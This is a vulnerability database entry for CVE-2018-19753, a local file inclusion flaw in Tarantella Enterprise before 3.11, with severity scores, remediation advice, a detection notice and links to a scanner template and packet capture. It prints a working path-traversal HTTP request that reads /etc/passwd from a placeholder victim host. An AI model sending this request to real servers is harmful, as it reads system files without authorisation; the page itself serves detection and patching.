🔙 목록으로 돌아가기

CVE-2018-19753: Tarantella Enterprise <3.11 - Local File Inclusion

TitleTarantella Enterprise <3.11 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
RemediationUpgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.73324
CVE IDCVE-2018-19753
CWE IDCWE-22
Tags cve cve2018 packetstorm seclists tarantella lfi oracle vuln

🔍 Vulnerability Description

Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.

🌐 HTTP Request

GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; en-US) Gecko/20010604 Firefox/109.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19753.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-19753.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A